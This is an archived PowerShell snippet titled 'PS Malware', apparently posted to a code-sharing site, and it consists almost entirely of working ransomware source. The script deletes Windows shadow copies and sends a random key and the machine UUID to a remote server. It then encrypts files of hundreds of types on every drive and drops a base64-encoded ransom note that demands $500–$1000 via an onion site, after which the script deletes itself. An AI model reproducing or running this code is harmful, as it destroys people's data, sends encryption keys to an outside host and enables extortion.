# encoding: ascii
# api: powershell
# title: PS Malware
# description: More malware from http://undoacne(dot)xyz/dl.php
# version: 0.1
# type: function
# author: madtomvane
# license: CC0
# x-poshcode-id: 6089
# x-archived: 2016-05-17T13:25:07
# x-published: 2016-11-13T22:07:00
#
#
$384862748483 = Get-WmiObject Win32_ShadowCopy
ForEach($82746478282 in $384862748483) {
$82746478282.Delete()
}
$739492774 = ([char[]](Get-Random -Input $(48..57 + 65..90 + 97..122) -Count 60)) -join ""
$uuid = (get-wmiobject Win32_ComputerSystemProduct).UUID $url = "http://edmontoncitysmart.com/wp-content/plugins/covertcontentwizard/get.php"
$parameters = "string=$739492774&uuid=$uuid"
$8374737 = New-Object -ComObject Msxml2.XMLHTTP $8374737.open('POST', $url, $false) $8374737.setRequestHeader("Content-type",
"application/x-www-form-urlencoded")
$8374737.setRequestHeader("Content-length", $post.length) $8374737.setRequestHeader("Connection", "close")
$8374737.send($parameters)
Start-Sleep -Seconds 150
[byte[]]$6458274672=[system.Text.Encoding]::Unicode.GetBytes($739492774)
$19387474823 = [Text.Encoding]::UTF8.GetBytes("WX2LBFPH7Nca6UEXN3MeVxNbHgxncGshdnvTgshjfd")
$838472783 = new-Object System.Security.Cryptography.RijndaelManaged
$838472783.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $739492774, $19387474823, 5).GetBytes(32) $838472783.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15] $838472783.Padding="Zeros"
$838472783.Mode="CBC"
$7382984778=gdr|where {$_.Free}|Sort-Object -Descending
foreach($263772627 in $7382984778){
gci $263772627.root -Recurse -Include "*.pdf","*.xls","*.docx","*.xlsx","*.mp3","*.waw","*.jpg","*.jpeg","*.txt","*.rtf","*.doc","*.rar","*.zip","*.psd","*.tif","*.wma","*.gif","*.bmp","*.ppt","*.pptx","*.docm","*.xlsm","*.pps","*.ppsx","*.ppd","*.eps","*.png","*.ace","*.djvu","*.tar","*.cdr","*.max","*.wmv","*.avi","*.wav","*.mp4","*.pdd","*.php","*.aac","*.ac3","*.amf","*.amr","*.dwg","*.dxf","*.accdb","*.mod","*.tax2013","*.tax2014","*.oga","*.ogg","*.pbf","*.ra","*.raw","*.saf","*.val","*.wave","*.wow","*.wpk","*.3g2","*.3gp","*.3gp2","*.3mm","*.amx","*.avs","*.bik","*.dir","*.divx","*.dvx","*.evo","*.flv","*.qtq","*.tch","*.rts","*.rum","*.rv","*.scn","*.srt","*.stx","*.svi","*.swf","*.trp","*.vdo","*.wm","*.wmd","*.wmmp","*.wmx","*.wvx","*.xvid","*.3d","*.3d4","*.3df8","*.pbs","*.adi","*.ais","*.amu","*.arr","*.bmc","*.bmf","*.cag","*.cam","*.dng","*.ink","*.jif","*.jiff","*.jpc","*.jpf","*.jpw","*.mag","*.mic","*.mip","*.msp","*.nav","*.ncd","*.odc","*.odi","*.opf","*.qif","*.xwd","*.abw","*.act","*.adt","*.aim","*.ans","*.asc","*.ase","*.bdp","*.bdr","*.bib","*.boc","*.crd","*.diz","*.dot","*.dotm","*.dotx","*.dvi","*.dxe","*.mlx","*.err","*.euc","*.faq","*.fdr","*.fds","*.gthr","*.idx","*.kwd","*.lp2","*.ltr","*.man","*.mbox","*.msg","*.nfo","*.now","*.odm","*.oft","*.pwi","*.rng","*.rtx","*.run","*.ssa","*.text","*.unx","*.wbk","*.wsh","*.7z","*.arc","*.ari","*.arj","*.car","*.cbr","*.cbz","*.gz","*.gzig","*.jgz","*.pak","*.pcv","*.puz","*.r00","*.r01","*.r02","*.r03","*.rev","*.sdn","*.sen","*.sfs","*.sfx","*.sh","*.shar","*.shr","*.sqx","*.tbz2","*.tg","*.tlz","*.vsi","*.wad","*.war","*.xpi","*.z02","*.z04","*.zap","*.zipx","*.zoo","*.ipa","*.isu","*.jar","*.js","*.udf","*.adr","*.ap","*.aro","*.asa","*.ascx","*.ashx","*.asmx","*.asp","*.indd","*.asr","*.qbb","*.bml","*.cer","*.cms","*.crt","*.dap","*.htm","*.moz","*.svr","*.url","*.wdgt","*.abk","*.bic","*.big","*.blp","*.bsp","*.cgf","*.chk","*.col","*.cty","*.dem","*.elf","*.ff","*.gam","*.grf","*.h3m","*.h4r","*.iwd","*.ldb","*.lgp","*.lvl","*.map","*.md3","*.mdl","*.mm6","*.mm7","*.mm8","*.nds","*.pbp","*.ppf","*.pwf","*.pxp","*.sad","*.sav","*.scm","*.scx","*.sdt","*.spr","*.sud","*.uax","*.umx","*.unr","*.uop","*.usa","*.usx","*.ut2","*.ut3","*.utc","*.utx","*.uvx","*.uxx","*.vmf","*.vtf","*.w3g","*.w3x","*.wtd","*.wtf","*.ccd","*.cd","*.cso","*.disk","*.dmg","*.dvd","*.fcd","*.flp","*.img","*.iso","*.isz","*.md0","*.md1","*.md2","*.mdf","*.mds","*.nrg","*.nri","*.vcd","*.vhd","*.snp","*.bkf","*.ade","*.adpb","*.dic","*.cch","*.ctt","*.dal","*.ddc","*.ddcx","*.dex","*.dif","*.dii","*.itdb","*.itl","*.kmz","*.lcd","*.lcf","*.mbx","*.mdn","*.odf","*.odp","*.ods","*.pab","*.pkb","*.pkh","*.pot","*.potx","*.pptm","*.psa","*.qdf","*.qel","*.rgn","*.rrt","*.rsw","*.rte","*.sdb","*.sdc","*.sds","*.sql","*.stt","*.t01","*.t03","*.t05","*.tcx","*.thmx","*.txd","*.txf","*.upoi","*.vmt","*.wks","*.wmdb","*.xl","*.xlc","*.xlr","*.xlsb","*.xltx","*.ltm","*.xlwx","*.mcd","*.cap","*.cc","*.cod","*.cp","*.cpp","*.cs","*.csi","*.dcp","*.dcu","*.dev","*.dob","*.dox","*.dpk","*.dpl","*.dpr","*.dsk","*.dsp","*.eql","*.ex","*.f90","*.fla","*.for","*.fpp","*.jav","*.java","*.lbi","*.owl","*.pl","*.plc","*.pli","*.pm","*.res","*.rsrc","*.so","*.swd","*.tpu","*.tpx","*.tu","*.tur","*.vc","*.yab","*.8ba","*.8bc","*.8be","*.8bf","*.8bi8","*.bi8","*.8bl","*.8bs","*.8bx","*.8by","*.8li","*.aip","*.amxx","*.ape","*.api","*.mxp","*.oxt","*.qpx","*.qtr","*.xla","*.xlam","*.xll","*.xlv","*.xpt","*.cfg","*.cwf","*.dbb","*.slt","*.bp2","*.bp3","*.bpl","*.clr","*.dbx","*.jc","*.potm","*.ppsm","*.prc","*.prt","*.shw","*.std","*.ver","*.wpl","*.xlm","*.yps","*.md3","*.1cd"|%{
try{
$7294877238 = New-Object System.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
if ($7294877238.BaseStream.Length -lt 44888){
$7857348728 = $7294877238.BaseStream.Length
}
else
{
$7857348728 = 44888
}
$6458274672 = $7294877238.ReadBytes($7857348728)
$7294877238.Close()
$548297563785 = $838472783.CreateEncryptor()
$47373823837537 = new-Object IO.MemoryStream
$658273648734 = new-Object Security.Cryptography.CryptoStream $47373823837537,$548297563785,"Write"
$658273648734.Write($6458274672, 0,$6458274672.Length)
$658273648734.Close()
$47373823837537.Close()
$548297563785.Clear()
$83865637482 = $47373823837537.ToArray()
$538853723428 = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
$538853723428.Write($83865637482,0,$83865637482.Length)
$538853723428.Close()
$57273472723473 = $_.Directory.ToString() + '\DECRYPT_INSTRUCTION.html'
$977364738569878 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGh0bWw+DQo8dGl0bGU+RmlsZXMgRW5jcnlwdGVkITwvdGl0bGU+DQo8c3R5bGU+DQphIHsgY29sb3I6Z3JlZW47IH0NCi50YiB7ICBiYWNrZ3JvdW5kOndoaXRlOyBib3JkZXItc3R5bGU6c29saWQ7IGJvcmRlci13aWR0aDoxcHg7IHBhZGRpbmc6M3B4OyBib3JkZXItY29sb3I6bGltZTsgfQ0KLnR0bCB7IGZvbnQtc2l6ZToxM3B4OyBjb2xvcjo4ODAwMDA7IH0NCjwvc3R5bGU+DQo8Ym9keSBzdHlsZT0id2lkdGg6MTAwJTsgYmFja2dyb3VuZDojMzNDQ0ZGOyI+DQogIDxjZW50ZXI+DQogIDxkaXYgc3R5bGU9InRleHQtYWxpZ246bGVmdDsgZm9udC1mYW1pbHk6QXJpYWw7IGZvbnQtc2l6ZToxM3B4OyBsaW5lLWhlaWdodDoyMHB4OyBtYXJnaW4tdG9wOjEwcHg7IHdpZHRoOjgwMHB4OyBiYWNrZ3JvdW5kOiNGNEY0RjQ7IHBhZGRpbmc6MjBweDsgYm9yZGVyLXN0eWxlOnNvbGlkOyBib3JkZXItd2lkdGg6NXB4OyBib3JkZXItY29sb3I6I0JBQkFCQTsiPg0KICAgIDxiPjxmb250IGNsYXNzPSJ0dGwiPldoYXQgaGFwcGVuZWQgdG8geW91ciBmaWxlcz88L2I+PC9mb250Pg0KICAgIDxicj4NCiAgICA8Zm9udCBzdHlsZT0iZm9udC1zaXplOjEzcHg7Ij5BbGwgb2YgeW91ciBmaWxlcyB3ZXJlIHByb3RlY3RlZCBieSBhIHN0cm9uZyBlbmNyeXB0aW9uIHdpdGggUlNBLTIwNDguDQogICAgPGJyPg0KICAgIE1vcmUgaW5mb3JtYXRpb24gYWJvdXQgdGhlIGVuY3J5cHRpb24ga2V5cyB1c2luZyBSU0EtMjA0OCBjYW4gYmUgZm91bmQgaGVyZTogPGEgaHJlZj0iaHR0cDovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9SU0FfKGNyeXB0b3N5c3RlbSkiIHRhcmdldD0iX2JsYW5rIj5odHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JTQV8oY3J5cHRvc3lzdGVtKTwvYT48YnI+PC9mb250Pg0KICAgIDxicj4NCiAgICA8Yj48Zm9udCBjbGFzcz0idHRsIj5XaGF0IGRvZXMgdGhpcyBtZWFuPzwvYj48L2ZvbnQ+DQogICAgPGJyPg0KICAgIDxmb250IHN0eWxlPSJmb250LXNpemU6MTNweDsiPg0KICAgICAgVGhpcyBtZWFucyB0aGF0IHRoZSBzdHJ1Y3R1cmUgYW5kIGRhdGEgd2l0aGluIHlvdXIgZmlsZXMgaGF2ZSBiZWVuIGlycmV2b2NhYmx5IGNoYW5nZWQsIHlvdSB3aWxsIG5vdCBiZSBhYmxlIHRvIHdvcms8YnI+IHdpdGggdGhlbSwgcmVhZCB0aGVtIG9yIHNlZSB0aGVtLCBpdCBpcyB0aGUgc2FtZSB0aGluZyBhcyBsb3NpbmcgdGhlbSBmb3JldmVyLCBidXQgd2l0aCBvdXIgaGVscCwgeW91IGNhbiByZXN0b3JlIHRoZW0uDQogICAgPC9mb250Pg0KICAgIDxicj48YnI+DQogICAgPGI+PGZvbnQgY2xhc3M9InR0bCI+SG93IGRpZCB0aGlzIGhhcHBlbj88L2I+PC9mb250Pg0KICAgIDxicj4NCiAgICA8Zm9udCBzdHlsZT0iZm9udC1zaXplOjEzcHg7Ij4NCiAgICAgIEVzcGVjaWFsbHkgZm9yIHlvdSwgb24gb3VyIHNlcnZlciB3YXMgZ2VuZXJhdGVkIHRoZSBzZWNyZXQga2V5IHBhaXIgUlNBLTIwNDggLSBwdWJsaWMgYW5kIHByaXZhdGUuDQogICAgICA8YnI+DQogICAgICBBbGwgeW91ciBmaWxlcyB3ZXJlIGVuY3J5cHRlZCB3aXRoIHRoZSBwdWJsaWMga2V5LCB3aGljaCBoYXMgYmVlbiB0cmFuc2ZlcnJlZCB0byB5b3VyIGNvbXB1dGVyIHZpYSB0aGUgSW50ZXJuZXQuDQogICAgICA8YnI+DQogICAgICBEZWNyeXB0aW5nIG9mIHlvdXIgZmlsZXMgaXMgb25seSBwb3NzaWJsZSB3aXRoIHRoZSBoZWxwIG9mIHRoZSBwcml2YXRlIGtleSBhbmQgZGVjcnlwdCBwcm9ncmFtLCB3aGljaCBpcyBvbiBvdXIgc2VjcmV0IHNlcnZlci4NCiAgICA8L2ZvbnQ+DQogICAgPGJyPjxicj4NCiAgICA8Yj48Zm9udCBjbGFzcz0idHRsIj5XaGF0IGRvIEkgZG8/PC9iPjwvZm9udD4NCiAgICA8YnI+DQogICAgPGZvbnQgc3R5bGU9ImZvbnQtc2l6ZToxM3B4OyI+DQogICAgICBBbGFzLCBpZiB5b3UgZG8gbm90IHRha2UgdGhlIG5lY2Vzc2FyeSBtZWFzdXJlcyBmb3IgdGhlIHNwZWNpZmllZCB0aW1lIHRoZW4gdGhlIGNvbmRpdGlvbnMgZm9yIG9idGFpbmluZyB0aGUgcHJpdmF0ZSBrZXkgd2lsbCBiZSBjaGFuZ2VkLg0KICAgICAgPGJyPg0KICAgICAgSWYgeW91IHJlYWxseSB2YWx1ZSB5b3VyIGRhdGEsIHRoZW4gd2Ugc3VnZ2VzdCB5b3UgZG8gbm90IHdhc3RlIHZhbHVhYmxlIHRpbWUgc2VhcmNoaW5nIGZvciBvdGhlciBzb2x1dGlvbnMgYmVjYXVzZSB0aGV5IGRvIG5vdCBleGlzdC4NCiAgICA8L2ZvbnQ+DQogICAgPGJyPjxicj4NCiAgICA8ZGl2IGNsYXNzPSJ0YiIgc3R5bGU9ImNvbG9yOiM4ODAwMDA7IGZvbnQtc2l6ZToxM3B4OyBib3JkZXItd2lkdGg6M3B4OyI+DQogICAgICBGb3IgbW9yZSBzcGVjaWZpYyBpbnN0cnVjdGlvbnMsIHBsZWFzZSB2aXNpdCB0aGlzIGhvbWUgcGFnZToNCiAgICAgIDxocj4NCiAgICAgIDxiPjEuPGEgaHJlZj0iaHR0cDovL3Zzd2Vma3FzaXBvZXVxNW8ub25pb24ubnUiIHRhcmdldD0iX2JsYW5rIj5odHRwOi8vdnN3ZWZrcXNpcG9ldXE1by5vbmlvbi5udTwvYT48L2I+DQogICAgICA8YnI+DQpQbGVhc2Ugc2Nyb2xsIGJlbG93IGZvciB5b3VyICNVVUlEPC9iPg0KICAgIDwvZGl2Pg0KICAgIDxicj4NCiAgICA8ZGl2IGNsYXNzPSJ0YiIgc3R5bGU9ImZvbnQtc2l6ZToxM3B4OyBib3JkZXItY29sb3I6Izg4MDAwMDsiPg0KICAgICAgSWYgZm9yIHNvbWUgcmVhc29ucyB0aGUgYWRkcmVzcyBpcyBub3QgYXZhaWxhYmxlLCBmb2xsb3cgdGhlc2Ugc3RlcHM6IDxocj4NCiAgICAgIDEuIERvd25sb2FkIGFuZCBpbnN0YWxsIHRvci1icm93c2VyOiA8YSBocmVmPSJodHRwOi8vd3d3LnRvcnByb2plY3Qub3JnL3Byb2plY3RzL3RvcmJyb3dzZXIuaHRtbC5lbiIgdGFyZ2V0PSJfYmxhbmsiPmh0dHA6Ly93d3cudG9ycHJvamVjdC5vcmcvcHJvamVjdHMvdG9yYnJvd3Nlci5odG1sLmVuPC9hPjxicj4NCiAgICAgIDIuIEFmdGVyIGEgc3VjY2Vzc2Z1bCBpbnN0YWxsYXRpb24sIHJ1biB0aGUgYnJvd3NlciBhbmQgd2FpdCBmb3IgaW5pdGlhbGl6YXRpb24uPGJyPg0KICAgICAgMy4gVHlwZSBpbiB0aGUgYWRkcmVzcyBiYXI6IDxmb250IHN0eWxlPSJmb250LXdlaWdodDpib2xkOyBjb2xvcjojMDA5OTc3OyI+dnN3ZWZrcXNpcG9ldXE1by5vbmlvbjwvZm9udD48YnI+DQogICAgICA0LiBGb2xsb3cgdGhlIGluc3RydWN0aW9ucyBvbiB0aGUgc2l0ZS4NCiAgICA8L2Rpdj4NCiAgICA8YnI+DQogICAgPGJyPg0KICAgIDxiPklNUE9SVEFOVCBJTkZPUk1BVElPTjo8L2I+PGJyPg0KICAgIDxkaXYgY2xhc3M9InRiIiBzdHlsZT0id2lkdGg6NzkwcHg7Ij4NCiAgICAgIFlvdXIgSG9tZSBQQUdFOiA8Yj48YSBocmVmPSJodHRwOi8vdnN3ZWZrcXNpcG9ldXE1by5vbmlvbi5udSIgdGFyZ2V0PSJfYmxhbmsiPmh0dHA6Ly92c3dlZmtxc2lwb2V1cTVvLm9uaW9uLm51PC9hPjwvYj48YnI+DQogICAgICBZb3VyIEhvbWUgUEFHRSh1c2luZyBUT1IpOiA8Zm9udCBzdHlsZT0iZm9udC13ZWlnaHQ6Ym9sZDsgY29sb3I6IzAwOTk3NzsiPnZzd2Vma3FzaXBvZXVxNW8ub25pb248L2ZvbnQ+PGJyPg0KICAgICAgPGI+UGxlYXNlIHNjcm9sbCBiZWxvdyBmb3IgeW91ciAjVVVJRDwvYj48YnI+DQogICAgPC9kaXY+DQogIDwvZGl2Pg0KICA8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4="));
if(!(Test-path($57273472723473))){
New-Item -Path $57273472723473 -ItemType file -Value $977364738569878
Add-Content -Path $57273472723473 -Value ("<p><h2>Your #UUID is $uuid</p></h2>")
Add-Content -Path $57273472723473 -Value ('<p><h2>Guaranteed recovery is provided before scheduled deletion of private key on the day of '+(Get-Date).AddDays(+30))
Add-Content -Path $57273472723473 -Value ('<p><h2>The price to obtain the decrypter goes from 500 $ to 1000 $ on the day of '+(Get-Date).AddDays(+10))
}}
catch
{
}
}}
function Delete() {
$Invocation = (Get-Variable MyInvocation -Scope 1).Value
#Path
$Path = $Invocation.MyCommand.Path
#Name
Write-Host $Path
Remove-Item $Path
}
# call function
Delete 㐲㐰